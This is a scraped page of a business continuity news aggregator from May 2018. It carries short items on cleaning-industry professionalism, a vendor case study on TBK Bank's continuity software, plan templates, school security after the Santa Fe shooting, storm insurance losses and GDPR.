Lack of education on the part of the authorities (such as local councils), building owners and property managers and employers, as well as the cleaners themselves is a major obstacle against the much-needed professionalisation of the industry. "Our architectural and engineering ability has reached the point where we can build the world's tallest buildings but our cleaning and maintenance ability has lagged far behind." WHAT BENCHMARK? There is no benchmark for players to strive to match and maybe exceed, with a view to promoting the development of the International cleaning service industry to the level where it can compete in the international market and export cleaning services. "The Government should nurture the industry so that it will reach that level."

Dr Bill Pomfret; MSc, FIOSH; RSP. Can be contacted: 26, Drysdale Street, Kanata, Ontario, K2K 3L3. Tel: 613-2549233; Website www.spi5star.com; e-mail: This email address is being protected from spambots. You need JavaScript enabled to view it..

Thursday, 24 May 2018 20:14

The Importance of Professional Cleaning

Community bank strengthens enterprise-wide business continuity program and vendor risk management capabilities

Fusion logoWith 53 branches, multiple ATMs, and banking seven days a week at two locations, TBK Bank strives to do the right thing to make customers’ lives better and easier.

Now, the bank has done the right thing for its customers by doing the right thing for its business continuity program, moving in just six months from a legacy planning tool to a data-centric business continuity management program built on the Fusion Framework® System™.  

The power of the solution creates synergies that allow the business continuity program to continue to grow and mature, taking on high priorities that were previously out of scope such as vendor risk management. This has significantly improved TBK Bank’s risk profile, with the end result being a greater ability to deliver great customer service at all times under any circumstances.

TBK Bank’s ongoing success has been accelerated with a regular infusion of Fusion’s creative Fuel offering and by connecting with the Fusion Community where best practices and new ideas are openly shared.

Making Business Continuity Holistic and Actionable

logo 2xTBK Bank recognizes the criticality of being always available for its customers. When the time came to move away from the lightweight legacy product the bank used for its business continuity program, Deb Wagamon, Business Continuity Manager at TBK Bank, examined the options in the marketplace. One of the vendors she contacted was Fusion Risk Management.

Wagamon explained why Fusion piqued her interest: “The first thing that impressed me was the fact that they were extremely interested in what I was doing and what my hindrances were and how they could help us. They didn’t start out like a normal vendor with ‘I can sell you this. This is what we can do for you.’ That told me I had a partner, rather than just a vendor trying to get money out of my company.”

Fusion rose to the top of the potential vendors because of the opportunity Wagamon had to try out the system. “They gave me a month trial period where I could enter my program’s data into the system and test it,” stated Wagamon. “Other vendors were offering much shorter trial periods – only a few days to a week. Plus, not only did Fusion allow me the sandbox to test in, but I was able to bounce questions off of Fusion personnel while I was doing it. Even before I was a customer, it was like I had a whole team helping bring my vision to life using the Fusion Framework System.

Recognizing that Fusion would make TBK Bank’s future business continuity goals possible in ways other vendors could not match, Wagamon committed to the Fusion Framework System.

The system brought together all of TBK Bank’s business continuity plans into one accessible and actionable location. Vulnerabilities and gaps were identified and remediated. Such a transformation would typically take years via a traditional approach, however, the Fusion Framework and its flexible, information-based approach and robust plan management infrastructure enabled the TBK Bank business continuity team to instill best practices in the program without starting from scratch. Wagamon affirmed, “It took me just six months to take my plan from ‘basic’ to ‘robust.’”

Managing Vendor Risk

TBK Bank worked with Fusion not only to leverage the Fusion Framework System for business continuity, but also to improve vendor risk management. Previously, Wagamon had vendor information in multiple places, so it was hard to manage, keep up to date, and pull together in the event of an audit. With over 350 vendors in play, she knew it was only a matter of time before something crucial was missed, with significant ramifications. “Trying to manage all the due diligence, contracts, and everything was becoming a nightmare. I had to get the vendor data into some kind of an automated tool,” explained Wagamon.

TBK Bank leveraged the flexibility and configurability of the Fusion Framework System to create a vendor management solution aligned with its specific needs. “I truly feel confident, because the Fusion Framework System handles everything. Processes are automated to eliminate human error. The system sends me an e-mail whenever I have to update insurance. If I’ve got a contract that’s coming up in 90 days, the business owner gets an e-mail saying, ‘Do you want to renew this or do you want to terminate?’ All I do now is manage.”

Plus, because the information foundation created by the Fusion Framework now contains comprehensive vendor data, the vendor risk management program is fully integrated with the business continuity program. This results in greater engagement of users and stronger end-to-end business continuity plans.

Fueling Further Success

To further the success of its business continuity program, TBK Bank took advantage of Fusion’s unique offering known as Fuel which pairs Wagamon’s group with an industry expert and a team of Fusion product experts. The team keeps TBK Bank’s program focused on the right priorities and provides expertise impossible to get from an internal resource. Wagamon noted, “This has been wonderful for me. I meet with an expert on a monthly basis and talk about my objectives for the next budget year, get help to resolve any issues I might have, and learn how to use the system to its fullest advantage.”

Additionally, Wagamon has benefited greatly from the knowledge sharing opportunities that are regularly available as a member of the Fusion community. Wagamon attends Fusion industry user groups, where she learns from her peers. She affirmed, “There’s always more to Fusion – it doesn’t matter how much you’re learning or how far you’ve come in the last two or three years, there’s just so much depth. The user groups are wonderful for allowing you to connect with the Fusion community, learn from fellow peers, and understand all the areas where Fusion can assist you.

Wagamon has been thrilled to share her experience with others. “I’ve been able to sit down with someone who is as frustrated as I used to be and tell them my story,” she stated. “Normally, I don’t make a stand and speak out in public about vendors, but with Fusion, I do.”

Thursday, 24 May 2018 17:45

Business Continuity You Can Bank On

Many organizations use templates to help them craft their business continuity plans.

In our opinion, this is an excellent way of going about doing it.

The “good” of using templates is significant and will be sketched out below.

If there is an “ugly” part about using templates, it’s what happens when organizations mistake filling out a template with the thought and analysis that comes with actual planning.

That being said, we commonly see more problems when organizations don’t use templates as a guide or standard for their planning efforts.

A surprisingly large number of organizations forgo the convenience and support of templates for a cooking-from-scratch approach. Moreover, they frequently have lots of different cooks.

Such organizations commonly task different individuals from across the company with writing the recovery plans for their respective departments. You can imagine the results: A large collection of mismatched plans varying widely in quality, comprehensiveness, level of detail, organization, and formatting. Some of these plans are liable to be excellent and some barely adequate. Many will have significant gaps, and since there’s no companywide documentation standard, they will probably all be confusing to anyone from outside the department who has to use them in an emergency. Talk about ugly.

In terms of the “bad” aspects of using templates, there really aren’t many. However there are some precautions you should keep in mind which using them, and which we’ll spell out in a moment.



(TNS) - In the aftermath of the Santa Fe High School shooting last week, Central Texas school officials are reviewing safety plans and working to tighten security, including for upcoming graduation ceremonies.

Officials with several area school districts said this week they will continue to conduct drills, including for lockdown, lockout and evacuations. They said they’ll also work with local law enforcement agencies to check school emergency response plans. Some school districts are taking further steps by adding more security measures for graduation ceremonies, exploring ways to limit how people can enter campuses and training staff on responding to an active shooter.

Eight students and two teachers were killed in the Santa Fe shooting. The accused shooter is a student at the school.

“AISD police is prepared to respond in a crisis and regularly works with outside police and safety organizations to ensure we have plans in place,” said Cristina Nguyen, spokeswoman for the Austin school district. “We will continually review our protocols and look for ways enhance the safety in our community.”

Nguyen added that the Frank Erwin Center will require graduation attendees to carry clear bags this year; the policy also applies to Eanes and Pflugerville school districts’ high school graduations at the venue. The Hays school district is requiring passes for individuals to access the floor of the Texas State University’s Strahan Coliseum where graduation will be held. Officials at other school districts such as Bastrop will add more officers and plain-clothes personnel as needed.



On May 11-16 a series of wind, hail and rain storms struck most states east of the Rocky Mountains. Karen Clark & Co. a catastrophe modeling firm, estimates that the storms will cost insurers $2.5 billion.

Most of the damage occurred in the Midwest, Northeast and Mid-Atlantic regions. Karen Clark predicts that insured losses higher than $100 million will be seen in: Colorado, Connecticut, Illinois, Indiana, Iowa, Kansas, Maryland, Michigan, New York, Ohio, Pennsylvania and Virginia.

The weather system (referred to as a ‘ring of fire’) led to over 600,000 power outages in the Mid-Atlantic and Northeast states.  Wind gusts over 58 miles per hour were reported as well as hundreds of hail storms and 28 tornadoes.



The European Union's (EU) General Data Protection Regulation, or GDPR for short, places stringent new rules on how enterprises manage and secure user data. A key consideration for enterprise CISOs and their data security teams, GDPR can also have a major impact on a company's data storage environment and the management thereof. We have long known the GDRP is on the way; it finally goes into effect on Friday, May 25, 2018.

GDPR affects non-European enterprises, too

Don't think that GDPR applies to organizations located outside of the EU? Think again.

First off, being based outside of the EU doesn't immunize the company from the regulation's requirements. If an organization collects data belonging to European users, GDPR applies, regardless of which country its headquarters calls home.



Page 1 of 2